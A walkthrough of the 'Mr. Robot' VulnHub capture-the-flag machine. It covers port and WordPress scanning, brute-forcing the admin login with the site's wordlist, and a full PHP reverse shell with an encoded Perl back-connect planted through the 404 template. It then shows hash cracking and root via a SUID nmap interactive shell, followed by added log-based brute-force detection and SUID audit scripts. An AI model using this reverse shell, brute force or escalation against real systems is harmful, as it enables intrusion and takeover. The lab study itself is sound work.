Target VM download: https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent
The machine this time is called Mr. Robot.
kali: 192.168.100.8
Win7: 192.168.100.9
==================================================================================================
Information gathering
Scan for the target's IP address:
nmap -sP 192.168.100.0/24
The target's IP address turns out to be 192.168.100.13.
Then run nmap -p 1-65535 192.168.100.13 to port-scan the target.
We start with port 80.
The page's animation replays a Linux boot and login sequence, and towards the end it offers you a few commands.
Let's look at its robots.txt:
http://192.168.100.13/robots.txt
Opening fsocity.dic, it looks like a wordlist for brute forcing.
We download it and save a de-duplicated copy:
wget http://192.168.100.13/fsocity.dic
cat fsocity.dic | sort | uniq > fsocity_sorted.dic
Next, open key-1-of-3.txt
which gives:
073403c8a58a1f80d943455fb30724b9
I then tried to crack it as an MD5 hash, but found no result.
Next we run nikto against the target to scan for vulnerabilities:
nikto -h 192.168.100.13
root@kali:~# nikto -h 192.168.100.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.100.13
+ Target Hostname: 192.168.100.13
+ Target Port: 80
+ Start Time: 2018-12-02 15:10:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.100.13/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2018-12-02 15:12:36 (GMT8) (153 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
This contains a lot of WordPress information.
You can also use nmap to enumerate paths:
nmap -Pn -n -p80 --script http-enum 192.168.100.13
root@kali:~# nmap -Pn -n -p80 --script http-enum 192.168.100.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 15:40 CST
Nmap scan report for 192.168.100.13
Host is up (0.00029s latency).

PORT STATE SERVICE
80/tcp open http
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 4.3.17
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
MAC Address: 08:00:27:26:9E:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.05 seconds
So let's use wpscan to see if we can find more useful information:
wpscan --url 192.168.100.13 -e vp
root@kali:~# wpscan --url 192.168.100.13 -e vp
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.100.13/
[+] Started: Sun Dec 2 15:18:48 2018

[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] robots.txt available under: http://192.168.100.13/robots.txt [HTTP 200]
[+] XML-RPC Interface available under: http://192.168.100.13/xmlrpc.php [HTTP 405]

[+] Enumerating WordPress version ...

[!] The WordPress 'http://192.168.100.13/readme.html' file exists exposing a version number
[+] WordPress version 4.3.17 (Released on 2018-07-05) identified from links opml
[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
[+] We found 8 plugins:
[+] Name: akismet
| Latest version: 4.1
| Last updated: 2018-11-12T19:38:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/akismet/
[!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: all-in-one-seo-pack - v2.0.4
| Last updated: 2018-10-24T22:24:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/
| Readme: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/readme.txt
[!] The version is out of date, the latest version is 2.9.1

[!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
Reference: https://wpvulndb.com/vulnerabilities/6888
Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
Reference: https://wpvulndb.com/vulnerabilities/6889
Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/7881
Reference: http://jvn.jp/en/jp/JVN75615300/index.html
Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
[i] Fixed in: 2.2.6

[!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7916
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 2.2.6.2

[!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8538
Reference: http://seclists.org/fulldisclosure/2016/Jul/23
Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
[i] Fixed in: 2.3.7

[!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8558
Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
[i] Fixed in: 2.3.8

[+] Name: all-in-one-wp-migration - v2.0.4
| Last updated: 2018-11-22T10:17:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/
| Readme: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/readme.txt
[!] The version is out of date, the latest version is 6.80

[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
Reference: https://wpvulndb.com/vulnerabilities/7857
Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5

[!] Title: All-in-One WP Migration <= 6.45 - Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8851
Reference: https://wordpress.org/plugins/all-in-one-wp-migration/#developers
[i] Fixed in: 6.46

[+] Name: contact-form-7 - v4.1
| Last updated: 2018-10-29T23:58:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/contact-form-7/
| Readme: http://192.168.100.13/wp-content/plugins/contact-form-7/readme.txt
[!] The version is out of date, the latest version is 5.0.5

[!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
Reference: https://wpvulndb.com/vulnerabilities/9127
Reference: https://contactform7.com/2018/09/04/contact-form-7-504/
Reference: https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
[i] Fixed in: 5.0.4

[+] Name: google-analytics-for-wordpress - v5.3.2
| Last updated: 2018-11-27T18:47:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/
| Readme: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/readme.txt
[!] The version is out of date, the latest version is 7.3.2

[!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7838
Reference: http://packetstormsecurity.com/files/130716/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7856
Reference: https://yoast.com/ga-plugin-security-update-more/
Reference: http://klikki.fi/adv/yoast_analytics.html
Reference: http://packetstormsecurity.com/files/130935/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7914
Reference: https://yoast.com/coordinated-security-release/
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
Reference: http://klikki.fi/adv/yoast_analytics2.html
[i] Fixed in: 5.4

[!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8147
Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
[i] Fixed in: 5.4.5

[+] Name: google-sitemap-generator - v4.0.7.1
| Last updated: 2018-04-25T15:06:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/
| Readme: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/readme.txt
[!] The version is out of date, the latest version is 4.0.9

[!] Title: Google XML Sitemaps <= 4.0.8 - Authenticated Reflected XSS (via HOST header)
Reference: https://wpvulndb.com/vulnerabilities/8762
Reference: https://plugins.trac.wordpress.org/browser/google-sitemap-generator/trunk/sitemap-ui.php#L1310
[i] Fixed in: 4.0.9

[+] Name: jetpack - v3.3.2
| Last updated: 2018-11-27T11:01:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/jetpack/
| Readme: http://192.168.100.13/wp-content/plugins/jetpack/readme.txt
[!] The version is out of date, the latest version is 6.8

[!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7915
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/
[i] Fixed in: 3.4.3

[!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7964
Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
[i] Fixed in: 3.5.3

[!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8201
Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.7.0 - Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8202
Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
Reference: https://wpvulndb.com/vulnerabilities/8472
Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/
Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446
[i] Fixed in: 3.9.2

[!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8500
Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/
Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability
Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10706
[i] Fixed in: 4.0.3

[!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
Reference: https://wpvulndb.com/vulnerabilities/8517
Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10705
[i] Fixed in: 4.0.4

[+] Name: wptouch - v3.7.3
| Last updated: 2018-11-21T19:54:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/wptouch/
| Readme: http://192.168.100.13/wp-content/plugins/wptouch/readme.txt
[!] The version is out of date, the latest version is 4.3.34

[!] Title: WPtouch Mobile Plugin <= 3.7.5.3 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7920
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 3.7.6

[+] Finished: Sun Dec 2 15:19:36 2018
[+] Elapsed time: 00:00:47
[+] Requests made: 2110
[+] Memory used: 135.586 MB
This enumerated the vulnerable plugins in the target's WordPress install, but exploiting them ultimately failed.
Let's visit /wp-admin
and try the default credentials admin/admin.
Error.
Here I used Burp to brute-force the username, with the fsocity_sorted.dic wordlist prepared earlier as the dictionary.
Capture the login POST request, then brute-force the username field with an arbitrary password.
The result is as follows.
We try logging in with elliot as the account.
The prompt that appears looks like this, which tells us the elliot account is valid.
Then we replace the username with elliot and brute-force the password with the same wordlist; the result is as follows.
Then we successfully get into the admin backend.
You can also brute-force with wpscan:
wpscan --url http://192.168.100.13 --wordlist=/root/fsocity_sorted.dic --username elliot --threads 20
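As an added example that is not part of the original write-up, here is the defender's side of the password guessing just described: a detector that parses Apache access-log lines and flags any source that POSTs to wp-login.php many times inside a short window, and notes whether a 302 (a successful login) followed the run of 200s. The log lines are constructed for the demo; only the lab IPs above are reused.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one access-log line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "status": int(m.group("status")),
            "path": m.group("path").split("?")[0],          # drop any query string
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def detect_wp_login_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag source IPs that POST to wp-login.php at least `threshold` times inside any window of
    `window_seconds`. WordPress answers a failed login with 200 and a successful one with 302."""
    posts = defaultdict(list)                      # ip -> [(timestamp, status), ...]
    for line in lines:
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"].endswith("/wp-login.php"):
            posts[e["ip"]].append((e["ts"], e["status"]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        start, peak = 0, 0
        for end in range(len(events)):             # sliding window over the sorted timestamps
            while events[end][0] - events[start][0] > timedelta(seconds=window_seconds):
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            # A 302 from a flagged source means one of the guesses was accepted.
            alerts[ip] = {"attempts": len(events), "peak_in_window": peak,
                          "login_succeeded": any(status == 302 for _, status in events)}
    return alerts

def build_sample_log():
    """Constructed sample traffic (not from the original page or the VM): one host posting to
    wp-login.php once per second, then a normal user viewing a post and logging in once."""
    base = datetime(2018, 12, 2, 15, 30, 0, tzinfo=timezone(timedelta(hours=8)))
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" {s} 512 "-" "Mozilla/5.0"'
    stamp = lambda sec: (base + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt.format(ip="192.168.100.8", ts=stamp(i), m="POST", p="/wp-login.php", s=200)
             for i in range(30)]
    lines.append(fmt.format(ip="192.168.100.8", ts=stamp(31), m="POST", p="/wp-login.php", s=302))
    lines.append(fmt.format(ip="192.168.100.9", ts=stamp(40), m="GET", p="/?p=23", s=200))
    lines.append(fmt.format(ip="192.168.100.9", ts=stamp(45), m="POST", p="/wp-login.php", s=302))
    return lines
```

Feed real access.log lines to detect_wp_login_bruteforce() instead of build_sample_log(); the path check also catches /blog/wp-login.php, which the scans above showed is served too.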
After logging into the backend, select
Use a PHP reverse shell:
<?php
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
// Run a command with whichever execution function the PHP configuration leaves enabled.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
// Write the base64-decoded text to a file.
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}
$yourip = "192.168.100.8"; // your IP (the Kali listener)
$yourport = '5555';        // your port
$usedb = array('perl' => 'perl', 'c' => 'c');
// Base64-encoded Perl back-connect script.
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" .
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" .
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" .
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" .
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" .
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" .
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
// Drop the script into /tmp and launch it towards the listener in the background.
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");
?>
Then start an nc listener on Kali.
After updating the 404 page, visit any non-existent page on the blog to trigger the reverse-shell code.
Then we ls to see what files there are.
Nothing useful here; let's look at the home directory.
The second key is here, but we have no read permission; only robot can read it.
Below it there is an md5 file, which we can read.
Then we go and crack this hash.
Cracked result: abcdefghijklmnopqrstuvwxyz
So now we can switch to the robot user and read that file.
But entering the password requires a tty; there are many ways to get one, here I use the Python method.
We get key 2:
822c73956184f694993bede3eb39f959
Next comes privilege escalation.
Check the target's kernel information.
With this information I went to https://www.exploit-db.com/ and looked for privilege escalation exploits I could use. I tried the OFS [CVE-2015-1328] and recvmsg [CVE-2014-0038] exploits, but neither got root.
Let's try another way to escalate privileges.
Find all SUID files on the system.
There is an nmap here, which brings to mind a classic nmap trick.
Older versions of Nmap (2.02 to 5.21) have an interactive mode that lets the user execute shell commands. Since Nmap is in the list of binaries that execute with root privileges, the interactive console can be used to run a shell with the same privileges.
Check the nmap version.
Enter Nmap interactive mode:
nmap --interactive
The following command gives an elevated shell:
!sh
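An added audit script, not from the original write-up, that turns this escalation path into a defensive check for the host owner: it reviews the output of find / -perm -4000, flags a SUID nmap whose version falls in the 2.02 to 5.21 interactive-mode range, and reports any other SUID binary outside an assumed baseline. The find output, the version banner and the baseline list are constructed assumptions, not values from the page.

```python
import re

# Assumed baseline of SUID-root binaries a stock install ships with; tune it per host.
EXPECTED_SUID = {
    "/bin/su", "/bin/ping", "/bin/mount", "/bin/umount", "/usr/bin/passwd", "/usr/bin/sudo",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}
# Nmap 2.02 through 5.21 ships an interactive mode that can run shell commands, so a SUID
# copy of one of those versions gives root to anyone who can execute it.
NMAP_INTERACTIVE_RANGE = ((2, 2), (5, 21))

def parse_version(banner):
    """Extract the version tuple from `nmap --version` output; None if no version is found."""
    m = re.search(r"Nmap version (\d+(?:\.\d+)*)", banner)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None

def nmap_has_interactive_mode(banner):
    v = parse_version(banner)
    return v is not None and NMAP_INTERACTIVE_RANGE[0] <= v <= NMAP_INTERACTIVE_RANGE[1]

def audit_suid(find_output, version_banner_for):
    """Review the output of `find / -perm -4000 -type f` and return (path, severity, note)
    findings. `version_banner_for(path)` must return the `--version` output of that binary."""
    findings = []
    for path in (line.strip() for line in find_output.splitlines()):
        if not path:
            continue
        if path.rsplit("/", 1)[-1] == "nmap":
            if nmap_has_interactive_mode(version_banner_for(path)):
                findings.append((path, "HIGH", "SUID nmap with interactive mode; "
                                               "remove the bit (chmod u-s) or upgrade"))
            else:
                findings.append((path, "MEDIUM", "SUID nmap; a scanner does not need the bit"))
        elif path not in EXPECTED_SUID:
            findings.append((path, "LOW", "SUID binary outside the expected baseline; review"))
    return findings

# Constructed sample (not from the page): find output and a version banner for a host
# laid out like the one in the write-up.
SAMPLE_FIND_OUTPUT = """\
/bin/ping
/bin/su
/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/local/bin/backup-helper
"""
SAMPLE_BANNERS = {"/usr/local/bin/nmap": "Nmap version 5.00 ( http://nmap.org )"}

def run_sample():
    return audit_suid(SAMPLE_FIND_OUTPUT, lambda p: SAMPLE_BANNERS.get(p, ""))
```

On a live host, pass the real find output and a callable that runs each candidate with --version via subprocess.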
Now that I have root access, I ran the command I used earlier to find every file matching the key files' naming pattern (find / -name 'key-*-of-3.txt' 2>/dev/null):
find / -name 'key-*-of-3.txt' 2>/dev/null